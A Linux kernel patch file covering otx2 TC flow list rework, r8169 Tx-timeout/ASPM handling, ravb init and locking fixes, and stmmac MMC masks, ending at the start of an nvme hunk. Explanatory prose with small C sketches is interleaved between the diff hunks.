++	if (!(pfvf->flags & OTX2_FLAG_MCAM_ENTRIES_ALLOC))
++		return;
++
++	list_for_each_entry_safe(iter, tmp, &flow_cfg->flow_list_tc, list) {
++		list_del(&iter->list);
++		kfree(iter);
++		flow_cfg->nr_flows--;
++	}
++}
++
++static struct otx2_tc_flow *otx2_tc_get_entry_by_cookie(struct otx2_flow_config *flow_cfg,
++							unsigned long cookie)
++{
++	struct otx2_tc_flow *tmp;
++
++	list_for_each_entry(tmp, &flow_cfg->flow_list_tc, list) {
++		if (tmp->cookie == cookie)
++			return tmp;
++	}
++
++	return NULL;
++}
++
++static struct otx2_tc_flow *otx2_tc_get_entry_by_index(struct otx2_flow_config *flow_cfg,
++						       int index)
++{
++	struct otx2_tc_flow *tmp;
++	int i = 0;
++
++	list_for_each_entry(tmp, &flow_cfg->flow_list_tc, list) {
++		if (i == index)
++			return tmp;
++		i++;
++	}
++
++	return NULL;
++}
++
++static void otx2_tc_del_from_flow_list(struct otx2_flow_config *flow_cfg,
++				       struct otx2_tc_flow *node)
++{
++	struct list_head *pos, *n;
++	struct otx2_tc_flow *tmp;
++
++	list_for_each_safe(pos, n, &flow_cfg->flow_list_tc) {
++		tmp = list_entry(pos, struct otx2_tc_flow, list);
++		if (node == tmp) {
++			list_del(&node->list);
++			return;
++		}
++	}
++}
++
++static int otx2_tc_add_to_flow_list(struct otx2_flow_config *flow_cfg,
++				    struct otx2_tc_flow *node)
++{
++	struct list_head *pos, *n;
++	struct otx2_tc_flow *tmp;
++	int index = 0;
++
++	/* If the flow list is empty then add the new node */
++	if (list_empty(&flow_cfg->flow_list_tc)) {
++		list_add(&node->list, &flow_cfg->flow_list_tc);
++		return index;
++	}
++
++	list_for_each_safe(pos, n, &flow_cfg->flow_list_tc) {
++		tmp = list_entry(pos, struct otx2_tc_flow, list);
++		if (node->prio < tmp->prio)
++			break;
++		index++;
++	}
++
++	list_add(&node->list, pos->prev);
++	return index;
++}
++
++static int otx2_add_mcam_flow_entry(struct otx2_nic *nic, struct npc_install_flow_req *req)
++{
++	struct npc_install_flow_req *tmp_req;
++	int err;
++
++	mutex_lock(&nic->mbox.lock);
++	tmp_req = otx2_mbox_alloc_msg_npc_install_flow(&nic->mbox);
++	if (!tmp_req) {
++		mutex_unlock(&nic->mbox.lock);
++		return -ENOMEM;
++	}
++
++	memcpy(tmp_req, req, sizeof(struct npc_install_flow_req));
++	/* Send message to AF */
++	err = otx2_sync_mbox_msg(&nic->mbox);
++	if (err) {
++		netdev_err(nic->netdev, "Failed to install MCAM flow entry %d\n",
++			   req->entry);
++		mutex_unlock(&nic->mbox.lock);
++		return -EFAULT;
++	}
++
++	mutex_unlock(&nic->mbox.lock);
++	return 0;
++}
++
++static int otx2_del_mcam_flow_entry(struct otx2_nic *nic, u16 entry, u16 *cntr_val)
+ {
++	struct npc_delete_flow_rsp *rsp;
+ 	struct npc_delete_flow_req *req;
+ 	int err;
+ 
+@@ -711,22 +817,113 @@ static int otx2_del_mcam_flow_entry(struct otx2_nic *nic, u16 entry)
+ 		mutex_unlock(&nic->mbox.lock);
+ 		return -EFAULT;
+ 	}
++
++	if (cntr_val) {
++		rsp = (struct npc_delete_flow_rsp *)otx2_mbox_get_rsp(&nic->mbox.mbox,
++								      0, &req->hdr);
++		if (IS_ERR(rsp)) {
++			netdev_err(nic->netdev, "Failed to get MCAM delete response for entry %d\n",
++				   entry);
++			mutex_unlock(&nic->mbox.lock);
++			return -EFAULT;
++		}
++
++		*cntr_val = rsp->cntr_val;
++	}
++
+ 	mutex_unlock(&nic->mbox.lock);
++	return 0;
++}
++
++static int otx2_tc_update_mcam_table_del_req(struct otx2_nic *nic,
++					     struct otx2_flow_config *flow_cfg,
++					     struct otx2_tc_flow *node)
++{
++	struct list_head *pos, *n;
++	struct otx2_tc_flow *tmp;
++	int i = 0, index = 0;
++	u16 cntr_val = 0;
++
++	/* Find and delete the entry from the list and re-install
++	 * all the entries from beginning to the index of the
++	 * deleted entry to higher mcam indexes.
++	 */
++	list_for_each_safe(pos, n, &flow_cfg->flow_list_tc) {
++		tmp = list_entry(pos, struct otx2_tc_flow, list);
++		if (node == tmp) {
++			list_del(&tmp->list);
++			break;
++		}
++
++		otx2_del_mcam_flow_entry(nic, tmp->entry, &cntr_val);
++		tmp->entry++;
++		tmp->req.entry = tmp->entry;
++		tmp->req.cntr_val = cntr_val;
++		index++;
++	}
++
++	list_for_each_safe(pos, n, &flow_cfg->flow_list_tc) {
++		if (i == index)
++			break;
++
++		tmp = list_entry(pos, struct otx2_tc_flow, list);
++		otx2_add_mcam_flow_entry(nic, &tmp->req);
++		i++;
++	}
+ 
+ 	return 0;
+ }
+ 
++static int otx2_tc_update_mcam_table_add_req(struct otx2_nic *nic,
++					     struct otx2_flow_config *flow_cfg,
++					     struct otx2_tc_flow *node)
++{
++	int mcam_idx = flow_cfg->max_flows - flow_cfg->nr_flows - 1;
++	struct otx2_tc_flow *tmp;
++	int list_idx, i;
++	u16 cntr_val = 0;
++
++	/* Find the index of the entry(list_idx) whose priority
++	 * is greater than the new entry and re-install all
++	 * the entries from beginning to list_idx to higher
++	 * mcam indexes.
++	 */
++	list_idx = otx2_tc_add_to_flow_list(flow_cfg, node);
++	for (i = 0; i < list_idx; i++) {
++		tmp = otx2_tc_get_entry_by_index(flow_cfg, i);
++		if (!tmp)
++			return -ENOMEM;
++
++		otx2_del_mcam_flow_entry(nic, tmp->entry, &cntr_val);
++		tmp->entry = flow_cfg->flow_ent[mcam_idx];
++		tmp->req.entry = tmp->entry;
++		tmp->req.cntr_val = cntr_val;
++		otx2_add_mcam_flow_entry(nic, &tmp->req);
++		mcam_idx++;
++	}
++
++	return mcam_idx;
++}
++
++static int otx2_tc_update_mcam_table(struct otx2_nic *nic,
++				     struct otx2_flow_config *flow_cfg,
++				     struct otx2_tc_flow *node,
++				     bool add_req)
++{
++	if (add_req)
++		return otx2_tc_update_mcam_table_add_req(nic, flow_cfg, node);
++
++	return otx2_tc_update_mcam_table_del_req(nic, flow_cfg, node);
++}
++
+ static int otx2_tc_del_flow(struct otx2_nic *nic,
+ 			    struct flow_cls_offload *tc_flow_cmd)
+ {
+ 	struct otx2_flow_config *flow_cfg = nic->flow_cfg;
+-	struct otx2_tc_info *tc_info = &nic->tc_info;
+ 	struct otx2_tc_flow *flow_node;
+ 	int err;
+ 
+-	flow_node = rhashtable_lookup_fast(&tc_info->flow_table,
+-					   &tc_flow_cmd->cookie,
+-					   tc_info->flow_ht_params);
++	flow_node = otx2_tc_get_entry_by_cookie(flow_cfg, tc_flow_cmd->cookie);
+ 	if (!flow_node) {
+ 		netdev_err(nic->netdev, "tc flow not found for cookie 0x%lx\n",
+ 			   tc_flow_cmd->cookie);
+@@ -734,6 +931,11 @@ static int otx2_tc_del_flow(struct otx2_nic *nic,
+ 	}
+ 
+ 	if (flow_node->is_act_police) {
++		__clear_bit(flow_node->rq, &nic->rq_bmap);
++
++		if (nic->flags & OTX2_FLAG_INTF_DOWN)
++			goto free_mcam_flow;
++
+ 		mutex_lock(&nic->mbox.lock);
+ 
+ 		err = cn10k_map_unmap_rq_policer(nic, flow_node->rq,
+@@ -749,21 +951,14 @@ static int otx2_tc_del_flow(struct otx2_nic *nic,
+ 				   "Unable to free leaf bandwidth profile(%d)\n",
+ 				   flow_node->leaf_profile);
+ 
+-		__clear_bit(flow_node->rq, &nic->rq_bmap);
+-
+ 		mutex_unlock(&nic->mbox.lock);
+ 	}
+ 
+-	otx2_del_mcam_flow_entry(nic, flow_node->entry);
+-
+-	WARN_ON(rhashtable_remove_fast(&nic->tc_info.flow_table,
+-				       &flow_node->node,
+-				       nic->tc_info.flow_ht_params));
++free_mcam_flow:
++	otx2_del_mcam_flow_entry(nic, flow_node->entry, NULL);
++	otx2_tc_update_mcam_table(nic, flow_cfg, flow_node, false);
+ 	kfree_rcu(flow_node, rcu);
+-
+-	clear_bit(flow_node->bitpos, tc_info->tc_entries_bitmap);
+ 	flow_cfg->nr_flows--;
+-
+ 	return 0;
+ }
+ 
+@@ -772,15 +967,19 @@ static int otx2_tc_add_flow(struct otx2_nic *nic,
+ {
+ 	struct netlink_ext_ack *extack = tc_flow_cmd->common.extack;
+ 	struct otx2_flow_config *flow_cfg = nic->flow_cfg;
+-	struct otx2_tc_info *tc_info = &nic->tc_info;
+ 	struct otx2_tc_flow *new_node, *old_node;
+ 	struct npc_install_flow_req *req, dummy;
+-	int rc, err;
++	int rc, err, mcam_idx;
+ 
+ 	if (!(nic->flags & OTX2_FLAG_TC_FLOWER_SUPPORT))
+ 		return -ENOMEM;
+ 
+-	if (bitmap_full(tc_info->tc_entries_bitmap, flow_cfg->max_flows)) {
++	if (nic->flags & OTX2_FLAG_INTF_DOWN) {
++		NL_SET_ERR_MSG_MOD(extack, "Interface not initialized");
++		return -EINVAL;
++	}
++
++	if (flow_cfg->nr_flows == flow_cfg->max_flows) {
+ 		NL_SET_ERR_MSG_MOD(extack,
+ 				   "Free MCAM entry not available to add the flow");
+ 		return -ENOMEM;
+@@ -792,6 +991,7 @@ static int otx2_tc_add_flow(struct otx2_nic *nic,
+ 		return -ENOMEM;
+ 	spin_lock_init(&new_node->lock);
+ 	new_node->cookie = tc_flow_cmd->cookie;
++	new_node->prio = tc_flow_cmd->common.prio;
+ 
+ 	memset(&dummy, 0, sizeof(struct npc_install_flow_req));
+ 
+@@ -802,12 +1002,11 @@ static int otx2_tc_add_flow(struct otx2_nic *nic,
+ 	}
+ 
+ 	/* If a flow exists with the same cookie, delete it */
+-	old_node = rhashtable_lookup_fast(&tc_info->flow_table,
+-					  &tc_flow_cmd->cookie,
+-					  tc_info->flow_ht_params);
++	old_node = otx2_tc_get_entry_by_cookie(flow_cfg, tc_flow_cmd->cookie);
+ 	if (old_node)
+ 		otx2_tc_del_flow(nic, tc_flow_cmd);
+ 
++	mcam_idx = otx2_tc_update_mcam_table(nic, flow_cfg, new_node, true);
+ 	mutex_lock(&nic->mbox.lock);
+ 	req = otx2_mbox_alloc_msg_npc_install_flow(&nic->mbox);
+ 	if (!req) {
+@@ -818,11 +1017,8 @@ static int otx2_tc_add_flow(struct otx2_nic *nic,
+ 
+ 	memcpy(&dummy.hdr, &req->hdr, sizeof(struct mbox_msghdr));
+ 	memcpy(req, &dummy, sizeof(struct npc_install_flow_req));
+-
+-	new_node->bitpos = find_first_zero_bit(tc_info->tc_entries_bitmap,
+-					       flow_cfg->max_flows);
+ 	req->channel = nic->hw.rx_chan_base;
+-	req->entry = flow_cfg->flow_ent[flow_cfg->max_flows - new_node->bitpos - 1];
++	req->entry = flow_cfg->flow_ent[mcam_idx];
+ 	req->intf = NIX_INTF_RX;
+ 	req->set_cntr = 1;
+ 	new_node->entry = req->entry;
+@@ -832,26 +1028,18 @@ static int otx2_tc_add_flow(struct otx2_nic *nic,
+ 	if (rc) {
+ 		NL_SET_ERR_MSG_MOD(extack, "Failed to install MCAM flow entry");
+ 		mutex_unlock(&nic->mbox.lock);
+-		kfree_rcu(new_node, rcu);
+ 		goto free_leaf;
+ 	}
+-	mutex_unlock(&nic->mbox.lock);
+ 
+-	/* add new flow to flow-table */
+-	rc = rhashtable_insert_fast(&nic->tc_info.flow_table, &new_node->node,
+-				    nic->tc_info.flow_ht_params);
+-	if (rc) {
+-		otx2_del_mcam_flow_entry(nic, req->entry);
+-		kfree_rcu(new_node, rcu);
+-		goto free_leaf;
+-	}
++	mutex_unlock(&nic->mbox.lock);
++	memcpy(&new_node->req, req, sizeof(struct npc_install_flow_req));
+ 
+-	set_bit(new_node->bitpos, tc_info->tc_entries_bitmap);
+ 	flow_cfg->nr_flows++;
+-
+ 	return 0;
+ 
+ free_leaf:
++	otx2_tc_del_from_flow_list(flow_cfg, new_node);
++	kfree_rcu(new_node, rcu);
+ 	if (new_node->is_act_police) {
+ 		mutex_lock(&nic->mbox.lock);
+ 
+@@ -878,16 +1066,13 @@ free_leaf:
+ static int otx2_tc_get_flow_stats(struct otx2_nic *nic,
+ 				  struct flow_cls_offload *tc_flow_cmd)
+ {
+-	struct otx2_tc_info *tc_info = &nic->tc_info;
+ 	struct npc_mcam_get_stats_req *req;
+ 	struct npc_mcam_get_stats_rsp *rsp;
+ 	struct otx2_tc_flow_stats *stats;
+ 	struct otx2_tc_flow *flow_node;
+ 	int err;
+ 
+-	flow_node = rhashtable_lookup_fast(&tc_info->flow_table,
+-					   &tc_flow_cmd->cookie,
+-					   tc_info->flow_ht_params);
++	flow_node = otx2_tc_get_entry_by_cookie(nic->flow_cfg, tc_flow_cmd->cookie);
+ 	if (!flow_node) {
+ 		netdev_info(nic->netdev, "tc flow not found for cookie %lx",
+ 			    tc_flow_cmd->cookie);
+@@ -1035,12 +1220,20 @@ static int otx2_setup_tc_block_ingress_cb(enum tc_setup_type type,
+ 					  void *type_data, void *cb_priv)
+ {
+ 	struct otx2_nic *nic = cb_priv;
++	bool ntuple;
+ 
+ 	if (!tc_cls_can_offload_and_chain0(nic->netdev, type_data))
+ 		return -EOPNOTSUPP;
+ 
++	ntuple = nic->netdev->features & NETIF_F_NTUPLE;
+ 	switch (type) {
+ 	case TC_SETUP_CLSFLOWER:
++		if (ntuple) {
++			netdev_warn(nic->netdev,
++				    "Can't install TC flower offload rule when NTUPLE is active");
++			return -EOPNOTSUPP;
++		}
++
+ 		return otx2_setup_tc_cls_flower(nic, type_data);
+ 	case TC_SETUP_CLSMATCHALL:
+ 		return otx2_setup_tc_ingress_matchall(nic, type_data);
+@@ -1123,18 +1316,8 @@ int otx2_setup_tc(struct net_device *netdev, enum tc_setup_type type,
+ }
+ EXPORT_SYMBOL(otx2_setup_tc);
+ 
+-static const struct rhashtable_params tc_flow_ht_params = {
+-	.head_offset = offsetof(struct otx2_tc_flow, node),
+-	.key_offset = offsetof(struct otx2_tc_flow, cookie),
+-	.key_len = sizeof(((struct otx2_tc_flow *)0)->cookie),
+-	.automatic_shrinking = true,
+-};
+-
+ int otx2_init_tc(struct otx2_nic *nic)
+ {
+-	struct otx2_tc_info *tc = &nic->tc_info;
+-	int err;
+-
+ 	/* Exclude receive queue 0 being used for police action */
+ 	set_bit(0, &nic->rq_bmap);
+ 
+@@ -1144,25 +1327,54 @@ int otx2_init_tc(struct otx2_nic *nic)
+ 		return -EINVAL;
+ 	}
+ 
+-	err = otx2_tc_alloc_ent_bitmap(nic);
+-	if (err)
+-		return err;
+-
+-	tc->flow_ht_params = tc_flow_ht_params;
+-	err = rhashtable_init(&tc->flow_table, &tc->flow_ht_params);
+-	if (err) {
+-		kfree(tc->tc_entries_bitmap);
+-		tc->tc_entries_bitmap = NULL;
+-	}
+-	return err;
++	return 0;
+ }
+ EXPORT_SYMBOL(otx2_init_tc);
+ 
+ void otx2_shutdown_tc(struct otx2_nic *nic)
+ {
+-	struct otx2_tc_info *tc = &nic->tc_info;
+-
+-	kfree(tc->tc_entries_bitmap);
+-	rhashtable_destroy(&tc->flow_table);
++	otx2_destroy_tc_flow_list(nic);
+ }
+ EXPORT_SYMBOL(otx2_shutdown_tc);
++
++static void otx2_tc_config_ingress_rule(struct otx2_nic *nic,
++					struct otx2_tc_flow *node)
++{
++	struct npc_install_flow_req *req;
++
++	if (otx2_tc_act_set_hw_police(nic, node))
++		return;
++
++	mutex_lock(&nic->mbox.lock);
++
++	req = otx2_mbox_alloc_msg_npc_install_flow(&nic->mbox);
++	if (!req)
++		goto err;
++
++	memcpy(req, &node->req, sizeof(struct npc_install_flow_req));
++
++	if (otx2_sync_mbox_msg(&nic->mbox))
++		netdev_err(nic->netdev,
++			   "Failed to install MCAM flow entry for ingress rule");
++err:
++	mutex_unlock(&nic->mbox.lock);
++}
++
++void otx2_tc_apply_ingress_police_rules(struct otx2_nic *nic)
++{
++	struct otx2_flow_config *flow_cfg = nic->flow_cfg;
++	struct otx2_tc_flow *node;
++
++	/* If any ingress policer rules exist for the interface then
++	 * apply those rules. Ingress policer rules depend on bandwidth
++	 * profiles linked to the receive queues. Since no receive queues
++	 * exist when interface is down, ingress policer rules are stored
++	 * and configured in hardware after all receive queues are allocated
++	 * in otx2_open.
++	 */
++	list_for_each_entry(node, &flow_cfg->flow_list_tc, list) {
++		if (node->is_act_police)
++			otx2_tc_config_ingress_rule(nic, node);
++	}
++}
++EXPORT_SYMBOL(otx2_tc_apply_ingress_police_rules);
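
The otx2_tc rework drops the rhashtable and entry bitmap in favour of flow_list_tc, a list kept sorted by TC priority: adding or deleting a rule re-installs the affected prefix of the list so that MCAM slots are assigned in priority order, with the counter hand-off above keeping statistics intact, and otx2_tc_apply_ingress_police_rules() replays stored police rules from otx2_open() once receive queues exist. The core bookkeeping is a priority-ordered insert that reports the position; a standalone sketch with a plain singly linked list:

#include <stddef.h>

struct flow {
	unsigned int prio;
	struct flow *next;
};

/* Insert keeping ascending priority order; equal priorities land after
 * existing entries, matching the break condition in
 * otx2_tc_add_to_flow_list(). Returns the zero-based position. */
static int insert_sorted(struct flow **head, struct flow *node)
{
	struct flow **pp = head;
	int index = 0;

	while (*pp && (*pp)->prio <= node->prio) {
		pp = &(*pp)->next;
		index++;
	}
	node->next = *pp;
	*pp = node;
	return index;
}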
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index 770391cefb4e4..abfa375b08878 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -576,6 +576,8 @@ struct rtl8169_tc_offsets {
+ enum rtl_flag {
+ 	RTL_FLAG_TASK_ENABLED = 0,
+ 	RTL_FLAG_TASK_RESET_PENDING,
++	RTL_FLAG_TASK_RESET_NO_QUEUE_WAKE,
++	RTL_FLAG_TASK_TX_TIMEOUT,
+ 	RTL_FLAG_MAX
+ };
+ 
+@@ -3943,7 +3945,7 @@ static void rtl8169_tx_timeout(struct net_device *dev, unsigned int txqueue)
+ {
+ 	struct rtl8169_private *tp = netdev_priv(dev);
+ 
+-	rtl_schedule_task(tp, RTL_FLAG_TASK_RESET_PENDING);
++	rtl_schedule_task(tp, RTL_FLAG_TASK_TX_TIMEOUT);
+ }
+ 
+ static int rtl8169_tx_map(struct rtl8169_private *tp, const u32 *opts, u32 len,
+@@ -4537,6 +4539,7 @@ static void rtl_task(struct work_struct *work)
+ {
+ 	struct rtl8169_private *tp =
+ 		container_of(work, struct rtl8169_private, wk.work);
++	int ret;
+ 
+ 	rtnl_lock();
+ 
+@@ -4544,9 +4547,21 @@ static void rtl_task(struct work_struct *work)
+ 	    !test_bit(RTL_FLAG_TASK_ENABLED, tp->wk.flags))
+ 		goto out_unlock;
+ 
++	if (test_and_clear_bit(RTL_FLAG_TASK_TX_TIMEOUT, tp->wk.flags)) {
++		/* ASPM compatibility issues are a typical reason for tx timeouts */
++		ret = pci_disable_link_state(tp->pci_dev, PCIE_LINK_STATE_L1 |
++							  PCIE_LINK_STATE_L0S);
++		if (!ret)
++			netdev_warn_once(tp->dev, "ASPM disabled on Tx timeout\n");
++		goto reset;
++	}
++
+ 	if (test_and_clear_bit(RTL_FLAG_TASK_RESET_PENDING, tp->wk.flags)) {
++reset:
+ 		rtl_reset_work(tp);
+ 		netif_wake_queue(tp->dev);
++	} else if (test_and_clear_bit(RTL_FLAG_TASK_RESET_NO_QUEUE_WAKE, tp->wk.flags)) {
++		rtl_reset_work(tp);
+ 	}
+ out_unlock:
+ 	rtnl_unlock();
+@@ -4580,7 +4595,7 @@ static void r8169_phylink_handler(struct net_device *ndev)
+ 	} else {
+ 		/* In few cases rx is broken after link-down otherwise */
+ 		if (rtl_is_8125(tp))
+-			rtl_reset_work(tp);
++			rtl_schedule_task(tp, RTL_FLAG_TASK_RESET_NO_QUEUE_WAKE);
+ 		pm_runtime_idle(d);
+ 	}
+ 
+@@ -4656,7 +4671,7 @@ static int rtl8169_close(struct net_device *dev)
+ 	rtl8169_down(tp);
+ 	rtl8169_rx_clear(tp);
+ 
+-	cancel_work_sync(&tp->wk.work);
++	cancel_work(&tp->wk.work);
+ 
+ 	free_irq(tp->irq, tp);
+ 
+@@ -4890,6 +4905,8 @@ static void rtl_remove_one(struct pci_dev *pdev)
+ 	if (pci_dev_run_wake(pdev))
+ 		pm_runtime_get_noresume(&pdev->dev);
+ 
++	cancel_work_sync(&tp->wk.work);
++
+ 	unregister_netdev(tp->dev);
+ 
+ 	if (tp->dash_type != RTL_DASH_NONE)
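
The r8169 change splits the single reset request into distinct work-flag bits so rtl_task() can tell a Tx timeout (which first disables ASPM) from a plain reset, and from a reset that must not wake the Tx queue; it also moves the final cancel_work_sync() to rtl_remove_one() so close no longer blocks on the worker. A compilable sketch of the test_and_clear_bit dispatch, with C11 atomics standing in for the kernel bitops:

    #include <stdatomic.h>
    #include <stdbool.h>
    #include <stdio.h>

    #define FLAG_RESET_PENDING (1UL << 0)
    #define FLAG_TX_TIMEOUT    (1UL << 1)

    static atomic_ulong wk_flags;

    static void schedule_task(unsigned long flag)
    {
        atomic_fetch_or(&wk_flags, flag);   /* then kick the workqueue */
    }

    static bool test_and_clear(unsigned long flag)
    {
        return atomic_fetch_and(&wk_flags, ~flag) & flag;
    }

    static void rtl_task_sketch(void)
    {
        if (test_and_clear(FLAG_TX_TIMEOUT)) {
            puts("disable ASPM first");
            goto reset;
        }
        if (test_and_clear(FLAG_RESET_PENDING)) {
    reset:
            puts("reset hardware and wake queues");
        }
    }

    int main(void)
    {
        schedule_task(FLAG_TX_TIMEOUT);
        rtl_task_sketch();
        return 0;
    }
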
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index 9a52283d77544..68cb5616ef991 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -517,6 +517,15 @@ static void ravb_emac_init_gbeth(struct net_device *ndev)
+ {
+ 	struct ravb_private *priv = netdev_priv(ndev);
+ 
++	if (priv->phy_interface == PHY_INTERFACE_MODE_MII) {
++		ravb_write(ndev, (1000 << 16) | CXR35_SEL_XMII_MII, CXR35);
++		ravb_modify(ndev, CXR31, CXR31_SEL_LINK0 | CXR31_SEL_LINK1, 0);
++	} else {
++		ravb_write(ndev, (1000 << 16) | CXR35_SEL_XMII_RGMII, CXR35);
++		ravb_modify(ndev, CXR31, CXR31_SEL_LINK0 | CXR31_SEL_LINK1,
++			    CXR31_SEL_LINK0);
++	}
++
+ 	/* Receive frame limit set register */
+ 	ravb_write(ndev, GBETH_RX_BUFF_MAX + ETH_FCS_LEN, RFLR);
+ 
+@@ -539,14 +548,6 @@ static void ravb_emac_init_gbeth(struct net_device *ndev)
+ 
+ 	/* E-MAC interrupt enable register */
+ 	ravb_write(ndev, ECSIPR_ICDIP, ECSIPR);
+-
+-	if (priv->phy_interface == PHY_INTERFACE_MODE_MII) {
+-		ravb_modify(ndev, CXR31, CXR31_SEL_LINK0 | CXR31_SEL_LINK1, 0);
+-		ravb_write(ndev, (1000 << 16) | CXR35_SEL_XMII_MII, CXR35);
+-	} else {
+-		ravb_modify(ndev, CXR31, CXR31_SEL_LINK0 | CXR31_SEL_LINK1,
+-			    CXR31_SEL_LINK0);
+-	}
+ }
+ 
+ static void ravb_emac_init_rcar(struct net_device *ndev)
+@@ -1827,19 +1828,20 @@ static int ravb_open(struct net_device *ndev)
+ 	if (info->gptp)
+ 		ravb_ptp_init(ndev, priv->pdev);
+ 
+-	netif_tx_start_all_queues(ndev);
+-
+ 	/* PHY control start */
+ 	error = ravb_phy_start(ndev);
+ 	if (error)
+ 		goto out_ptp_stop;
+ 
++	netif_tx_start_all_queues(ndev);
++
+ 	return 0;
+ 
+ out_ptp_stop:
+ 	/* Stop PTP Clock driver */
+ 	if (info->gptp)
+ 		ravb_ptp_stop(ndev);
++	ravb_stop_dma(ndev);
+ out_free_irq_mgmta:
+ 	if (!info->multi_irqs)
+ 		goto out_free_irq;
+@@ -1890,6 +1892,12 @@ static void ravb_tx_timeout_work(struct work_struct *work)
+ 	struct net_device *ndev = priv->ndev;
+ 	int error;
+ 
++	if (!rtnl_trylock()) {
++		usleep_range(1000, 2000);
++		schedule_work(&priv->work);
++		return;
++	}
++
+ 	netif_tx_stop_all_queues(ndev);
+ 
+ 	/* Stop PTP Clock driver */
+@@ -1923,7 +1931,7 @@ static void ravb_tx_timeout_work(struct work_struct *work)
+ 		 */
+ 		netdev_err(ndev, "%s: ravb_dmac_init() failed, error %d\n",
+ 			   __func__, error);
+-		return;
++		goto out_unlock;
+ 	}
+ 	ravb_emac_init(ndev);
+ 
+@@ -1933,6 +1941,9 @@ out:
+ 		ravb_ptp_init(ndev, priv->pdev);
+ 
+ 	netif_tx_start_all_queues(ndev);
++
++out_unlock:
++	rtnl_unlock();
+ }
+ 
+ /* Packet transmit function for Ethernet AVB */
+@@ -2661,9 +2672,14 @@ static int ravb_probe(struct platform_device *pdev)
+ 	ndev->features = info->net_features;
+ 	ndev->hw_features = info->net_hw_features;
+ 
+-	reset_control_deassert(rstc);
++	error = reset_control_deassert(rstc);
++	if (error)
++		goto out_free_netdev;
++
+ 	pm_runtime_enable(&pdev->dev);
+-	pm_runtime_get_sync(&pdev->dev);
++	error = pm_runtime_resume_and_get(&pdev->dev);
++	if (error < 0)
++		goto out_rpm_disable;
+ 
+ 	if (info->multi_irqs) {
+ 		if (info->err_mgmt_irqs)
+@@ -2888,11 +2904,12 @@ out_disable_gptp_clk:
+ out_disable_refclk:
+ 	clk_disable_unprepare(priv->refclk);
+ out_release:
+-	free_netdev(ndev);
+-
+ 	pm_runtime_put(&pdev->dev);
++out_rpm_disable:
+ 	pm_runtime_disable(&pdev->dev);
+ 	reset_control_assert(rstc);
++out_free_netdev:
++	free_netdev(ndev);
+ 	return error;
+ }
+ 
+@@ -2902,22 +2919,26 @@ static int ravb_remove(struct platform_device *pdev)
+ 	struct ravb_private *priv = netdev_priv(ndev);
+ 	const struct ravb_hw_info *info = priv->info;
+ 
+-	/* Stop PTP Clock driver */
+-	if (info->ccc_gac)
+-		ravb_ptp_stop(ndev);
+-
+-	clk_disable_unprepare(priv->gptp_clk);
+-	clk_disable_unprepare(priv->refclk);
+-
+-	/* Set reset mode */
+-	ravb_write(ndev, CCC_OPC_RESET, CCC);
+ 	unregister_netdev(ndev);
+ 	if (info->nc_queues)
+ 		netif_napi_del(&priv->napi[RAVB_NC]);
+ 	netif_napi_del(&priv->napi[RAVB_BE]);
++
+ 	ravb_mdio_release(priv);
++
++	/* Stop PTP Clock driver */
++	if (info->ccc_gac)
++		ravb_ptp_stop(ndev);
++
+ 	dma_free_coherent(ndev->dev.parent, priv->desc_bat_size, priv->desc_bat,
+ 			  priv->desc_bat_dma);
++
++	/* Set reset mode */
++	ravb_write(ndev, CCC_OPC_RESET, CCC);
++
++	clk_disable_unprepare(priv->gptp_clk);
++	clk_disable_unprepare(priv->refclk);
++
+ 	pm_runtime_put_sync(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 	reset_control_assert(priv->rstc);
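
The ravb timeout worker now takes RTNL with rtnl_trylock() and requeues itself on contention: close and remove run under RTNL and cancel this very work item, so sleeping on rtnl_lock() here could deadlock. A small pthread sketch of the trylock-or-requeue idiom (the synchronous requeue() is only a stand-in for schedule_work()):

    #include <pthread.h>
    #include <stdio.h>
    #include <unistd.h>

    static pthread_mutex_t cfg_lock = PTHREAD_MUTEX_INITIALIZER;

    static void timeout_work(void);

    /* Stand-in for schedule_work(); a real workqueue runs this later. */
    static void requeue(void (*fn)(void))
    {
        fn();
    }

    static void timeout_work(void)
    {
        if (pthread_mutex_trylock(&cfg_lock) != 0) {
            /* The lock holder may be waiting for this work to
             * finish, so back off and retry instead of blocking. */
            usleep(1000);
            requeue(timeout_work);
            return;
        }
        puts("lock held: safe to stop queues and reinit DMA");
        pthread_mutex_unlock(&cfg_lock);
    }

    int main(void)
    {
        timeout_work();
        return 0;
    }
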
+diff --git a/drivers/net/ethernet/stmicro/stmmac/mmc_core.c b/drivers/net/ethernet/stmicro/stmmac/mmc_core.c
+index ea4910ae0921a..6a7c1d325c464 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/mmc_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/mmc_core.c
+@@ -177,8 +177,10 @@
+ #define MMC_XGMAC_RX_DISCARD_OCT_GB	0x1b4
+ #define MMC_XGMAC_RX_ALIGN_ERR_PKT	0x1bc
+ 
++#define MMC_XGMAC_TX_FPE_INTR_MASK	0x204
+ #define MMC_XGMAC_TX_FPE_FRAG		0x208
+ #define MMC_XGMAC_TX_HOLD_REQ		0x20c
++#define MMC_XGMAC_RX_FPE_INTR_MASK	0x224
+ #define MMC_XGMAC_RX_PKT_ASSEMBLY_ERR	0x228
+ #define MMC_XGMAC_RX_PKT_SMD_ERR	0x22c
+ #define MMC_XGMAC_RX_PKT_ASSEMBLY_OK	0x230
+@@ -352,6 +354,8 @@ static void dwxgmac_mmc_intr_all_mask(void __iomem *mmcaddr)
+ {
+ 	writel(0x0, mmcaddr + MMC_RX_INTR_MASK);
+ 	writel(0x0, mmcaddr + MMC_TX_INTR_MASK);
++	writel(MMC_DEFAULT_MASK, mmcaddr + MMC_XGMAC_TX_FPE_INTR_MASK);
++	writel(MMC_DEFAULT_MASK, mmcaddr + MMC_XGMAC_RX_FPE_INTR_MASK);
+ 	writel(MMC_DEFAULT_MASK, mmcaddr + MMC_XGMAC_RX_IPC_INTR_MASK);
+ }
+ 
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 25ddfabc58f73..5b156c5bc04a5 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -2058,6 +2058,13 @@ static int nvme_update_ns_info_block(struct nvme_ns *ns,
